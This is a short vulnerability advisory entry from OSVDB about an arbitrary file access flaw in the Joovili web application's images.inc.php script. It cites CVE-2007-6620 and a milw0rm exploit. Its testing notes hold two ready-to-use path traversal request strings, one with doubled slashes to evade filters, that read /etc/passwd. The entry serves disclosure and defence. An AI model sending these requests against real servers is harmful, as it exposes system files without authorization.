Joovili include/images.inc.php picture Variable Traversal Arbitrary File Access

2007-12-27T00:00:00
ID OSVDB:40153
Type osvdb
Reporter OSVDB
Modified 2007-12-27T00:00:00

Description

Manual Testing Notes

include/images.inc.php?picture=../../../../../../../../etc/passwd&thumbnail=FALSE include/images.inc.php?picture=../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd&thumbnail=FALSE

References:

Secunia Advisory ID:28231 Generic Exploit URL: http://www.milw0rm.com/exploits/4799 CVE-2007-6620 Bugtraq ID: 27056